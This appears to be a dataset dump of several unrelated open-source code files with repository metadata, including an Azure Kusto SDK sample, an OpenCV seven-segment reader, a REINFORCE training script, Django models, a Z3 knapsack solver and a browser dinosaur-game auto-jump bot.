AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = KustoManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-1234-123456789098",
)
response = client.managed_private_endpoints.check_name_availability(
resource_group_name="kustorptest",
cluster_name="kustoCluster",
resource_name={"name": "pme1", "type": "Microsoft.Kusto/clusters/managedPrivateEndpoints"},
)
print(response)
# x-ms-original-file: specification/azure-kusto/resource-manager/Microsoft.Kusto/stable/2023-05-02/examples/KustoManagedPrivateEndpointsCheckNameAvailability.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
e6f85ea7d60c1bbd053c560d72b230436add4e1e | 0aeddf7f9b47b9b0d66dc00a589b9bcf4409a779 | /reader.py | d149b9b74dc8c972bd12ea0ec40ef96e4f19ddff | [] | no_license | Weird407/seven_segment_reader | 8aa9ec9eb59f0b92a192e592d3a231cb9527522a | 4c797e06cdb7b58d8bb1e2bef7173ed3021d42b2 | refs/heads/master | 2022-12-05T17:24:53.974367 | 2020-08-09T18:49:30 | 2020-08-09T18:49:30 | 286,269,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,119 | py | import cv2
import numpy as np
import sys
import os
import csv
import scratch
import find_seven
import select_digit
#input variables
dir_str = 'folder_dir'
outfile = 'out.csv'
#target temp and where the decimals are
target = 100
decimalpos = 1
#For light correction
alpha = 0.6
beta = 5
#For troubleshooting
TroubleShoot= False
#initialize
first = True
Temperature = []
scale = 4
def col2bin(image):
#Lower contrast to correct overlighting
img = cv2.convertScaleAbs(image, alpha=alpha, beta=beta)
#Convert to greyscale
grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#Convert to Binary
thresh = 128
bin_img = cv2.threshold(grey, thresh, 255, cv2.THRESH_BINARY)[1]
return bin_img
def gettemp(data, decim):
T = ""
if data:
for i in np.arange(np.size(data)-decim):
if data[i] != "":
T = T + data[i]
if decim >0:
T=T+"."
for i in np.flip(np.arange(decim))+1:
T = T + data[-i]
return T
#Loop over files in folder
dir = os.fsencode(dir_str)
for filename in os.listdir(dir):
filename = filename.decode("utf-8")
filename = dir_str+"/" + filename
#First figure out useful information
if first:
#Obtain image
image = cv2.imread(filename)
#Obtain cropping region
c = scratch.Cropper(image)
c.crop()
cropcor = c._coords
#Crop
(x1, y1), (x2, y2) = c._coords
cropped = c._image[y1:y2, x1:x2]
#resize
h = scale*np.size(cropped,0)
w = scale*np.size(cropped,1)
cropped2 = cv2.resize(cropped,(w,h))
#Find position of 7 segments, as many as user adds
d = find_seven.finder(cropped2)
d.find_segment()
pos_o = d._coords
#scale down due to scaling
pos = tuple(tuple(int(i / scale) for i in inner) for inner in pos_o)
#Convert to Binary
bin_img = col2bin(cropped)
#Show during checking
if TroubleShoot:
cv2.imshow('binary test',bin_img)
cv2.waitKey(0)
#Read segment values
out = select_digit.read_seg(bin_img,pos)
#Convert to temperature
temp = gettemp(out,decimalpos)
#Save value
#print(temp,type(temp))
Temperature.append(temp)
first = False
else:
#Obtain image
image = cv2.imread(filename)
#Crop
cropped = image[y1:y2, x1:x2]
#Convert to Binary
bin_img = col2bin(cropped)
#Show during checking
if TroubleShoot:
cv2.imshow('binary test',bin_img)
cv2.waitKey(0)
#Read segment values
out = select_digit.read_seg(bin_img,pos)
temp = gettemp(out,decimalpos)
#Save value
#print(temp)
Temperature.append(temp)
#todo: output a file
rows = zip(Temperature)
with open(outfile, "w") as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
| [
"noreply@github.com"
] | Weird407.noreply@github.com |
9c6cc4ccb6bdedbe6825c841e92cc5e2f6db3342 | a731abc2f0ebe0ff1338c764ee093a4a99810069 | /utils/common.py | d9983f69ef93dd00574853089a03f907a1491532 | [] | no_license | Performer941/gitcode | c4db7d8d42c22d2c8791fef3e48d517c29217cb8 | 04d3edd01eb45f76a8d659a322e75fbac1398544 | refs/heads/master | 2023-01-11T11:16:41.227353 | 2020-11-10T06:31:05 | 2020-11-10T06:31:05 | 297,247,309 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | def show_top_6_news_style(index):
if index == 1:
return "first"
elif index == 2:
return "second"
elif index == 3:
return "third"
return ""
def show_news_status_name(index):
if index == 0:
return "已通过"
elif index == 1:
return "审核中"
elif index == -1:
return "未通过"
return ""
def show_news_status_style_name(index):
if index == 0:
return "pass"
elif index == 1:
return "review"
elif index == -1:
return "nopass"
return ""
| [
"15815094902@163.com"
] | 15815094902@163.com |
4595a31d07bbb6f2e6c205978e1c9d182a7c6f09 | 20b3c72df77fe5f5c3b5853c625f994c066cdc66 | /examples/reinforce.py | 39777a11f76666ede6bdb67d2d4aed2b46a4ca2f | [] | no_license | batermj/CampX | ae66526a7632dad8bb163c1764c3640cf58a560c | 2246c8a526015bee0340c4a145f07621d46ec79d | refs/heads/master | 2020-04-08T11:50:20.268761 | 2018-11-21T15:13:00 | 2018-11-21T15:13:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,245 | py | import random
import argparse
import sys
import gym
import csv
import time
import numpy as np
from itertools import count
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.distributions import Categorical
# BOAT RACE HELPERS
from boat_race import make_game
from boat_race import step_perf
from boat_race import select_action_preset
from boat_race import all_actions_readable
parser = argparse.ArgumentParser(description='CampX REINFORCE example')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor (default: 0.99)')
parser.add_argument('--seed', type=int, default=543, metavar='N',
help='random seed (default: 543)')
parser.add_argument('--render', action='store_true',
help='render the environment')
parser.add_argument('--log_interval', type=int, default=1, metavar='N',
help='interval between training status logs (default: 10)')
parser.add_argument('--max_episodes', type=int, default=100,
help='maximum number of episodes to run')
parser.add_argument('--env_max_steps', type=int, default=100,
help='maximum steps in each episodes to run')
parser.add_argument('--num_runs', type=int, default=5,
help='number of runs to perform')
parser.add_argument('--exp_name_prefix', type=str, default='default_exp_name_prefix',
help='prefix to name of experiment')
parser.add_argument('--verbose', action='store_true',
help='output verbose logging for steps')
parser.add_argument('--action_preset', action='store_true',
help='use preset actions, useful for debugging')
parser.add_argument('--env_boat_race', action='store_true',
help='use boat race environment')
parser.add_argument('--sassy', action='store_true',
help='secret agent in secret environment')
args = parser.parse_args()
class Policy(nn.Module):
def __init__(self, input_size, hidden_size, output_size):
super(Policy, self).__init__()
self.affine1 = nn.Linear(input_size, hidden_size, bias=False)
self.affine2 = nn.Linear(hidden_size, output_size, bias=False)
self.saved_log_probs = []
self.rewards = []
def forward(self, x):
x = self.affine1(x)
x = F.relu(x)
x = self.affine2(x)
action_scores = F.softmax(x, dim=0)
return action_scores
def select_action(state):
if args.env_boat_race:
probs = policy(Variable(state))
m = Categorical(probs)
selected_action = m.sample()
action = torch.Tensor([0,0,0,0,0])
action[selected_action.data] = 1
log_prob = m.log_prob(selected_action)
policy.saved_log_probs.append(log_prob)
else:
state = Variable(torch.from_numpy(state).float())
probs = policy(state)
m = Categorical(probs)
try:
action = m.sample()
except RuntimeError as error:
print(error)
print('m', m, 'probs', probs, 'state', state)
sys.exit(0)
policy.saved_log_probs.append(m.log_prob(action))
return action
def finish_episode():
R = 0
policy_loss = []
rewards = []
for r in policy.rewards[::-1]:
R = r + args.gamma * R
rewards.insert(0, R)
rewards = torch.Tensor(rewards)
rewards = (rewards - rewards.mean()) / (rewards.std() + eps)
for log_prob, reward in zip(policy.saved_log_probs, rewards):
policy_loss.append(-log_prob * reward)
optimizer.zero_grad()
policy_loss = torch.cat(policy_loss).sum()
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
return policy_loss
def main(run_id='default_id', exp_log_file_writer='default_exp_log_file_writer'):
'''Main run code.'''
# Initialize the running reward to track task completion.
ep_rewards = []
total_steps = 0
ep_start_time = time.time()
for i_episode in range(args.max_episodes): # count(1):
if args.env_boat_race:
# Use the boat race interface.
game, board, reward, discount = make_game()
state = board.layered_board.view(-1).float()
# reset the hidden performance measure
ep_performance = 0
ep_performances = []
else:
# Use the standard gym interface
state = env.reset()
# Don't loop forever, add one to the env_max_steps
# to make sure to take the final step
last_time = time.time()
for t in range(env_max_steps):
# increment the global step counter
total_steps += 1
action = select_action(state)
if args.env_boat_race:
# get the agent starting position in ByteTensor shape of env
# adding 0 copies the data to a new object, and is thus
# undisturbed by the performance of the action
location_of_agent_pre = (board.layers['A']+0)
# use a preset action scheme to test the
# env reward calculation and the performance measurement
if args.action_preset:
action = select_action_preset(t)
action_readable = all_actions_readable[np.argmax(list(action))]
# Step through environment using chosen action
board, reward, discount = game.play(action)
state = board.layered_board.view(-1).float()
location_of_agent_post = board.layers['A']
# update the agent performance measure
print(a, b, c, d, location_of_agent_pre, location_of_agent_post)
print(type(a), type(b), type(c), type(d), type(location_of_agent_pre), type(location_of_agent_post))
one_step_performance = step_perf(a, b, c, d, location_of_agent_pre, location_of_agent_post)
ep_performance = ep_performance + one_step_performance
if args.verbose:
print('t(ms): {}, t: {}, a: {}, r: {}, p: {}'.format(
round(1000 * (time.time() - last_time), 2), t, action_readable, reward, one_step_performance))
last_time = time.time()
else:
state, reward, done, _ = env.step(action.data[0])
if args.render and (i_episode % 100 == 0) and not args.env_boat_race:
env.render()
policy.rewards.append(reward)
if not args.env_boat_race:
if done:
break
# collect relevant metrics for reporting
if args.env_boat_race:
ep_rewards.append(np.sum(policy.rewards))
ep_performances.append(ep_performance)
else:
ep_rewards.append(t)
# calculate the policy loss, update the model
# clear saved rewards and log probs
policy_loss = finish_episode()
ep_report_time = round(time.time() - ep_start_time, 2)
ep_start_time = time.time()
# Logging and reporting
if args.env_boat_race:
ep_fields = [run_id, total_steps, ep_report_time,
i_episode, round(policy_loss.data[0],2),
ep_rewards[-1], np.mean(ep_rewards[-5:]),
ep_performances[-1], np.mean(ep_performances)]
exp_log_file_writer.writerow(ep_fields)
if i_episode % args.log_interval == 0:
print('id: {}, t(s): {}, ep: {}, L: {}, R: {:.2f}, R_av_5: {:.2f}, P: {:.2f}, P_av: {:.2f}'.format(
run_id, ep_report_time, i_episode, round(policy_loss.data[0],2),
ep_rewards[-1], np.mean(ep_rewards[-5:]), ep_performances[-1], np.mean(ep_performances)))
else:
if i_episode % args.log_interval == 0:
print('t(s): {}, ep: {}, R: {:.2f}, R_av_5: {:.2f}'.format(
ep_report_time, i_episode, ep_rewards[-1], np.mean(ep_rewards[-5:])))
# calculate a moving average of running rewards
avg_ep_reward = np.mean(ep_rewards)
if avg_ep_reward > reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(avg_ep_reward, t))
break
if __name__ == '__main__':
# Select and define the environment
if not args.env_boat_race:
env = gym.make('CartPole-v0')
env.seed(args.seed)
reward_threshold = env.spec.reward_threshold
input_size = 4
output_size = 2
env_max_steps = 10000
else:
game, board, reward, discount = make_game()
input_size = board.layered_board.view(-1).shape[0]
output_size = 5
env_max_steps = args.env_max_steps
reward_threshold = 30 # env.spec.reward_threshold
if args.sassy:
import syft as sy
hook = sy.TorchHook(verbose=True)
me = hook.local_worker
me.is_client_worker = True
bob = sy.VirtualWorker(id="bob", hook=hook, is_client_worker=False)
alice = sy.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
james = sy.VirtualWorker(id="james", hook=hook, is_client_worker=False)
me.add_worker(bob)
me.add_workers([bob, alice])
bob.add_workers([alice])
alice.add_workers([bob])
james.add_workers([me, bob, alice])
# build shared views for the board
# named a,b,c,d
a = torch.zeros(5,5).long()
a[1, 2] = 1
a[3, 2] = 1
# print('a', a)
b = torch.zeros(5,5).long()
b[1, 3] = 1
b[3, 1] = 1
# print('b', b)
c = a.t()
# print('c', c)
d = torch.zeros(5,5).long()
d[1, 1] = 1
d[3, 3] = 1
# print('d', d)
# share the environment
game, board, reward, discount = make_game()
game.share(bob, alice)
a = a.share(bob, alice)
b = b.share(bob, alice)
c = c.share(bob, alice)
d = d.share(bob, alice)
eps = np.finfo(np.float32).eps.item()
# Build an output file for processing results
logging_dir = 'logs/'
if not os.path.exists(logging_dir):
os.makedirs(logging_dir)
with open('logs/'+args.exp_name_prefix +
'_n{}_steps{}_eps{}_gamma{}_sassy{}'.format(args.num_runs,
args.env_max_steps,
args.max_episodes,
args.gamma,
int(args.sassy)) +'.csv', mode='w') as exp_log_file:
# write the header row
fieldnames = ['id', 'step', 't(s)', 'ep', 'L', 'R', 'R_av_5', 'P', 'P_av']
exp_log_file_writer = csv.writer(exp_log_file, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
exp_log_file_writer.writerow(fieldnames)
for run_id in range(args.num_runs):
# Manually set the random seed for Torch
torch.manual_seed(args.seed + (run_id * random.randint(1, args.seed)))
hidden_size = 32
learning_rate = 1e-2
policy = Policy(input_size=input_size,
hidden_size=hidden_size,
output_size=output_size)
optimizer = optim.Adam(policy.parameters(),
lr=learning_rate)
# Share the weight data with campx sassy protocol
if args.env_boat_race and args.sassy:
W = policy.affine1.weight.data
W = W.fix_precision().share(bob, alice)
W2 = policy.affine2.weight.data
W2 = W2.fix_precision().share(bob, alice)
main(run_id=str(run_id), exp_log_file_writer=exp_log_file_writer) | [
"korymath@google.com"
] | korymath@google.com |
4a44f30e7234d05326d59edc14ee988f60ce1cf7 | 3a46b5fb48201507a962944ddb4fe7d7c891f1b2 | /strokesort.py | 2f52035897fbd7827afd99ff76cc63832a71cf7f | [] | no_license | OllieMBM/LROverlay | 2bdf8a09d446dd78218f1726b44357692429d93c | 2bd6e17a8a024fe44148ec8fe8cfcd388aad9730 | refs/heads/master | 2020-05-02T10:12:17.167216 | 2019-04-19T10:32:21 | 2019-04-19T10:32:21 | 177,890,998 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,115 | py | from random import *
from PIL import Image, ImageDraw, ImageOps
from util import *
def sortlines(lines):
print("optimizing stroke sequence...")
clines = lines[:]
slines = [clines.pop(0)]
while clines != []:
x,s,r = None,1000000,False
for l in clines:
d = distsum(l[0],slines[-1][-1])
dr = distsum(l[-1],slines[-1][-1])
if d < s:
x,s,r = l[:],d,False
if dr < s:
x,s,r = l[:],s,True
clines.remove(x)
if r == True:
x = x[::-1]
slines.append(x)
return slines
def visualize(lines):
import turtle
wn = turtle.Screen()
t = turtle.Turtle()
t.speed(0)
t.pencolor('red')
t.pd()
for i in range(0,len(lines)):
for p in lines[i]:
t.goto(p[0]*640/1024-320,-(p[1]*640/1024-320))
t.pencolor('black')
t.pencolor('red')
turtle.mainloop()
if __name__=="__main__":
import linedraw
#linedraw.draw_hatch = False
lines = linedraw.sketch("Lenna")
#lines = sortlines(lines)
visualize(lines)
| [
"noreply@github.com"
] | OllieMBM.noreply@github.com |
937a4be3329f93a1d8831852a43f326e18a8929f | c7ffba3213c9fc8267bc27d1b6d1dbfac35ef980 | /tensorflow_encrypted/player/__main__.py | 79e29b785cca05295c76efd1f9ae744105064b57 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jvmncs/tf-encrypted | b2ac47176ee86d534456f85e71905db1badea512 | 5b0ac035b64b8de41a54779da56a496014caf583 | refs/heads/master | 2022-01-04T23:57:32.626529 | 2018-09-18T18:57:54 | 2018-09-18T18:57:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | from ..config import RemoteConfig
if __name__ == '__main__':
import argparse
import tensorflow_encrypted as tfe
parser = argparse.ArgumentParser(description="Run a tf-encrypted player")
parser.add_argument('name', metavar='NAME', type=str, help='name of player as specified in the config file')
parser.add_argument('--config', metavar='FILE', type=str, help='path to configuration file', default='./config.json')
args = parser.parse_args()
config = tfe.config.load(args.config)
# pylint: disable=E1101
if isinstance(config, RemoteConfig):
server = config.server(args.name)
server.start()
server.join()
| [
"noreply@github.com"
] | jvmncs.noreply@github.com |
4cf0c6c0adb228ba8a653b2c0ff7e3085e3351bd | ab124df80f241ee4634041a5110553c603a7c168 | /flask_app/Env2Pytorch/Trainer.py | c2fa5adf3d2d32eceec6eec010170ef7abaec5a1 | [] | no_license | thibaultdalmon/RecommenderSystem | 8a07b2f5a0ffff53a421d7a7b06c1837b2bd4417 | 9f2bad06ceb2451977873d77aa50e33b2f2fc518 | refs/heads/master | 2020-04-20T01:11:25.572272 | 2019-02-27T21:49:04 | 2019-02-27T21:49:04 | 168,538,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,224 | py | from Env2Pytorch.SiameseNetwork import SiameseNetwork
from Env2Pytorch.Generator import DataGenerator, collate_data_pos_neg, Data, collate_data
import torch
from torch.optim import Adam
from torch.nn import MarginRankingLoss
from torch.utils.data import DataLoader, WeightedRandomSampler
class Trainer:
def __init__(self, interface, learning_rate=3e-4, batch_size=32, margin=10, num_samples=100, user_embedding_dim=10,
item_embedding_dim=10, user_meta_dim=15, item_meta_dim=15, meta_meta_dim=30, dense_1_dim=32,
dense_2_dim=15, dropout=0.5):
self.interface = interface
self.margin = margin
self.learning_rate = learning_rate
self.user_embedding_dim = user_embedding_dim
self.item_embedding_dim = item_embedding_dim
self.user_meta_dim = user_meta_dim
self.item_meta_dim = item_meta_dim
self.meta_meta_dim = meta_meta_dim
self.dense_1_dim = dense_1_dim
self.dense_2_dim = dense_2_dim
self.dropout = dropout
self.network = SiameseNetwork(interface, user_embedding_dim=self.user_embedding_dim,
item_embedding_dim=item_embedding_dim, user_meta_dim=user_meta_dim,
item_meta_dim=item_meta_dim, meta_meta_dim=meta_meta_dim, dense_1_dim=dense_1_dim,
dense_2_dim=dense_2_dim, dropout=dropout)
self.dataset = DataGenerator(interface.state_history, interface.rewards_history, interface.action_history)
self.batch_size = batch_size
self.num_samples = num_samples
self.loss = MarginRankingLoss(margin=margin, reduction='none')
self.optimizer = Adam(self.network.parameters(), lr=learning_rate)
def reset(self, n):
self.network = SiameseNetwork(self.interface, user_embedding_dim=self.user_embedding_dim,
item_embedding_dim=self.item_embedding_dim, user_meta_dim=self.user_meta_dim,
item_meta_dim=self.item_meta_dim, meta_meta_dim=self.meta_meta_dim,
dense_1_dim=self.dense_1_dim, dense_2_dim=self.dense_2_dim, dropout=self.dropout)
self.dataset = DataGenerator(self.interface.state_history, self.interface.rewards_history,
self.interface.action_history)
self.loss = MarginRankingLoss(margin=self.margin, reduction='none')
self.optimizer = Adam(self.network.parameters(), lr=self.learning_rate)
self.train(n)
def train(self, n=1):
for _ in range(n):
weights = [data.weight for data in self.dataset]
sampler = WeightedRandomSampler(weights=weights, num_samples=self.num_samples, replacement=True)
data_loader = DataLoader(self.dataset, batch_size=self.batch_size, sampler=sampler,
collate_fn=collate_data_pos_neg, drop_last=True)
self.network.train()
for inputs in data_loader:
self.optimizer.zero_grad()
output_pos = self.network(inputs['user_id_pos'], inputs['item_id_pos'], inputs['metadata_pos'])
output_neg = self.network(inputs['user_id_neg'], inputs['item_id_neg'], inputs['metadata_neg'])
loss = self.loss(output_pos, output_neg, torch.ones(output_pos.shape))
for j, data in enumerate(inputs['raw_data']):
data.weight = loss[j][0].item()
loss = loss.mean()
loss.backward()
self.optimizer.step()
def online(self, n=1):
self.network.eval()
l = []
my_state = self.interface.next_state
for m in self.interface.next_state:
data = Data(m[0], m[1], m[2:])
l.append(data)
inputs = collate_data(l)
output = self.network(inputs['user_id'], inputs['item_id'], inputs['metadata']).squeeze()
recommended_item = output.argmax().item()
state, reward = self.interface.predict(recommended_item)
self.dataset.add_data(my_state, recommended_item, reward)
self.train(n=n)
return reward
| [
"emmanuel.goutierre@mac.com"
] | emmanuel.goutierre@mac.com |
f9149adc1d138f483eb14838fe57cbf12e65eec4 | 5de5ae0adb6fb1e73c2e897fbc13b6abf53c559b | /Applications/Equations/knapsack-1.py | 98dc10ab696f6baaedba79c8b32dbe93669eedb8 | [] | no_license | Trietptm-on-Coding-Algorithms/Learning-Z3 | af935450226ee3299e10361f21a567945aa0fd5c | c5ef7faca49aa164556b3c7e9ccfb4709027cf74 | refs/heads/master | 2020-05-13T18:34:38.105308 | 2017-12-23T11:08:43 | 2017-12-23T11:08:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | # Solving knapsack problem with Z3
#
# Use:
# python knapsack.py
#
from z3 import *
# from https://www.xkcd.com/287/
fruits, fries, salad, wings, sticks, plate = Ints('fruits fries salad wings sticks plate')
s = Solver()
s.add(fruits>=0, fries>=0, salad>=0, wings>=0, sticks>=0, plate>=0)
s.add(215*fruits + 275*fries + 225*salad + 355*wings + 420*sticks + 580*plate == 1505)
result = []
while s.check() == sat:
m = s.model()
print(m)
result.append(m)
# Create new constraint the blocks the current model
block = []
for el in m:
# el is a declaration
if el.arity() > 0:
raise Z3Exception("uninterpreted function are not supported")
# Create a constant from declaration
obj = el()
if is_array(obj) or obj.sort().kind() == Z3_UNINTERPRETED_SORT:
raise Z3Exception("arrays and uninterpreted sorts are not supported")
block.append(obj != m[el])
s.add(Or(block))
print(len(result))
# https://stackoverflow.com/questions/141779/solving-the-np-complete-proble | [
"me@xathrya.id"
] | me@xathrya.id |
76648c1719437d1cca16d3f5e6dee46b6f6cbab5 | e8201f803bb23a1b9a3eab9fc0fc9b1709e65d2e | /examples/readme_example/convolutional_neural_network_with_images.py | 56eb89da6db0a88cc9529e3b8d07bb8623575244 | [
"MIT"
] | permissive | helblazer811/ManimML | 20bc3548ceab75745a8d8088929fec51057e130f | 5df233ea90aba16611d29c6a4b7717eb08ae7e09 | refs/heads/main | 2023-08-09T07:50:38.605540 | 2023-07-22T02:43:52 | 2023-07-22T02:43:52 | 454,906,591 | 1,339 | 73 | MIT | 2023-04-11T02:22:49 | 2022-02-02T19:26:55 | Python | UTF-8 | Python | false | false | 1,185 | py | from manim import *
from PIL import Image
import numpy as np
from manim_ml.neural_network import (
Convolutional2DLayer,
FeedForwardLayer,
NeuralNetwork,
ImageLayer,
)
# Make the specific scene
config.pixel_height = 700
config.pixel_width = 1900
config.frame_height = 7.0
config.frame_width = 7.0
class CombinedScene(ThreeDScene):
def construct(self):
# Make nn
image = Image.open("../../assets/mnist/digit.jpeg")
numpy_image = np.asarray(image)
# Make nn
nn = NeuralNetwork(
[
ImageLayer(numpy_image, height=1.5),
Convolutional2DLayer(1, 7, filter_spacing=0.32),
Convolutional2DLayer(3, 5, 3, filter_spacing=0.32),
Convolutional2DLayer(5, 3, 3, filter_spacing=0.18),
FeedForwardLayer(3),
FeedForwardLayer(3),
],
layer_spacing=0.25,
)
# Center the nn
nn.move_to(ORIGIN)
self.add(nn)
# Play animation
forward_pass = nn.make_forward_pass_animation()
self.play(ChangeSpeed(forward_pass, speedinfo={}), run_time=10)
self.wait(1)
| [
"alechelbling1@gmail.com"
] | alechelbling1@gmail.com |
0145502ae27b1857fbbc4bfe35266ed6fb8cc781 | cd357fade47e9e6bd2bb20cb56a9a917ffa02b65 | /12. Django Level One - Basic/first_project/first_app/models.py | 9a7097a3f85f45d3f324bf68b85f713a88295ad8 | [] | no_license | sys-ryan/python-django-fullstack-bootcamp | 7ec89571b5c0bda48733ddca2a4d56e21cbfb2f4 | 7592966e6450fbe3d7b81d59d4c1116c2d882a03 | refs/heads/main | 2023-02-05T08:50:38.850492 | 2020-12-27T08:18:33 | 2020-12-27T08:18:33 | 316,863,692 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from django.db import models
# Create your models here.
class Topic(models.Model):
top_name = models.CharField(max_length=264, unique=True)
def __str__(self):
return self.top_name
class Webpage(models.Model):
topic = models.ForeignKey(Topic, on_delete=models.CASCADE)
name = models.CharField(max_length=264, unique=True)
url = models.URLField(unique=True)
def __str__(self):
return self.name
class AccessRecord(models.Model):
name = models.ForeignKey(Webpage, on_delete=models.CASCADE)
date = models.DateField()
def __str__(self):
return str(self.date)
| [
"sys.ryan0902@gmail.com"
] | sys.ryan0902@gmail.com |
5b554006c6a01ce73dace158e660e50bc655ea26 | 9f44a4da4bac9d986efa028364f81d8818d6beee | /Examples/Python/B-main.py | 3c8453e82b5f8b16cb61b85aaac5d99d5a014487 | [] | no_license | kempy007/GoDinoBot | 2ee0260ad6370544095ada7ebf0c9834f09cdaa1 | 92289c1bd5e0aef2206b73796f8c2f12a3d97f9a | refs/heads/main | 2023-03-28T00:51:25.352833 | 2021-03-31T13:29:32 | 2021-03-31T13:29:32 | 339,737,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,785 | py | import cv2
import numpy as np
from PIL import ImageGrab # windows and mac
# import pyscreenshot as ImageGrab # linux
import ctypes
# import os # for linux key press
# bbox = (450, 230, 500, 265) fix
# bbox = (Left, Top, Right, Bottom)
#bbox = (965, 240, 1925, 500) ## fullgame not required need to be smaller focus area
bbox = (1200, 400, 1270, 435) # ROI infront of dino
shape = (bbox[3]-bbox[1], bbox[2]-bbox[0], 3)
bg = 255
ref_frame = np.full(shape, bg)
i = 1
while True:
# capturing the frame.
img = ImageGrab.grab(bbox)
frame = np.array(img)
cv2.imshow("frame", frame)
# updating the reference frame with the background change.
# toggling between white frame and black frame.
if bg != frame[0][0][0]:
bg = frame[0][0][0]
ref_frame = np.full(shape, bg)
i += 1
# comparing the captured frame and reference frame.
frame_diff = np.subtract(ref_frame, frame).sum()
# if frames aren't the same, obstacle detected and jump.
if frame_diff != 0:
ctypes.windll.user32.keybd_event(0x20, 0, 0, 0) # Space is down
# os.system('xdotool key space') # for linux
# updating the frame capture region to adapt with the increasing speed.
if i % 4 == 0:
bbox = (bbox[0]+1, bbox[1], bbox[2]+1, bbox[3])
shape = (bbox[3]-bbox[1], bbox[2]-bbox[0], 3)
ref_frame = np.full(shape, bg)
print(f"update {i}")
i += 1
# listen for ESC key to exit.
if cv2 .waitKey(1) == 27: # when ESC is pressed
break
cv2.destroyAllWindows()
| [
"martyn.kemp@fedex.com"
] | martyn.kemp@fedex.com |
93a0eb840fa8fc830723313a1c68008955196626 | 2f468b6c7526f3be2865dafe52f49e51ea4758e0 | /Basic Data Structure/นับตัวอักษรจากข้อความที่ผู้ใช้ป้อนให้จนกว่าจะได้รับข้อความว่า 'end'.py | bd47fa7ef4a3139ea9994e338f2feba4f57497e5 | [] | no_license | iceman951/Intro-Python-with-Sadhu-Coding-system | 0db07aa61bc12128c743b61ea57a9092de5ab0b0 | 501e1c3349ce1c071b589a46a3e64b427b0b91ac | refs/heads/master | 2022-12-14T22:33:57.208009 | 2020-09-11T15:12:50 | 2020-09-11T15:12:50 | 294,337,271 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | counts = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
text = ''
sentence =''
while True:
text = input('Enter string: ').strip().lower()
if text == 'end': break
else: sentence += text
for i in range(len(sentence)):
if sentence[i] >= 'a' and sentence[i] <= 'z':
index = ord(sentence[i]) -97
counts[index] += 1
print('''******************************
* Alphabet Counting *
******************************''')
for i in range(len(counts)):
if counts[i] > 0:
character = chr(ord('a') + i)
print(character,counts[i])
print('******************************') | [
"noreply@github.com"
] | iceman951.noreply@github.com |
72f2a2f8488c5accfd2e8dc40590cc94d1e9616d | a7e8d2748b6ccf0e71140ff4659165eb527e8aa8 | /ORM_INTRO_DEMO/apps/read/views.py | 45af7cc13b16742b91988ff0c7dafea6499602a7 | [] | no_license | cuixiaozhao/ORM_LOOKUP_DEMO | 77fb96d73365aba46f73a6f32f7aa1d853a4574a | cbfafde42e1f6726773db9ac3257c103deabc736 | refs/heads/master | 2020-04-12T13:31:59.667741 | 2018-12-20T05:57:02 | 2018-12-20T05:57:02 | 162,524,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from django.shortcuts import render
# Create your views here.
def read_view(request):
pass | [
"tqtl@tqtl.org"
] | tqtl@tqtl.org |
a0492b3c64aec3811c6644f1b4ea321bfb7ad35d | 49c83faa47be183499d5264e2e7aacfce460fcee | /felipetio/settings/production.py | 2018f6dd5e6cfed7dcef7fc05a0cbe896060d70c | [] | no_license | felipetio/felipetio | 0a4b912f28101baecdc4db9610732527d291638c | f881745dfa30e546e82e6283ca4f79f3a1d6f307 | refs/heads/main | 2022-02-01T01:53:07.812028 | 2022-01-12T15:03:56 | 2022-01-12T15:03:56 | 145,920,124 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | from .base import *
DEBUG = False
ALLOWED_HOSTS = ["felipetio.herokuapp.com", "felipet.io", "www.felipet.io"]
| [
"me@felipet.io"
] | me@felipet.io |
212ff7bb2d292acfcdecc48ba1e36050aa9e18ed | 7b02411227428bb746e7622736dc006ee24ca925 | /fhirclient/models/practitioner.py | a031183a9a28ca6bf7c19c5f0c4696218a018c6b | [] | no_license | NCATS-Tangerine/CPKG | 81c74abaec8de75ad769724e84d893dec117cf97 | 92b6079d61bdb975a0a4bc08879f56b686ff08ef | refs/heads/master | 2022-12-10T17:55:52.586808 | 2019-08-20T20:19:56 | 2019-08-20T20:19:56 | 202,387,355 | 0 | 0 | null | 2022-12-08T06:01:57 | 2019-08-14T16:29:04 | Python | UTF-8 | Python | false | false | 3,478 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.1.0-0931132380 (http://hl7.org/fhir/StructureDefinition/Practitioner) on 2019-08-06.
# 2019, SMART Health IT.
import sys
from dataclasses import dataclass
from typing import ClassVar, Optional, List
from .fhirabstractbase import empty_list
from .address import Address
from .attachment import Attachment
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .contactpoint import ContactPoint
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .humanname import HumanName
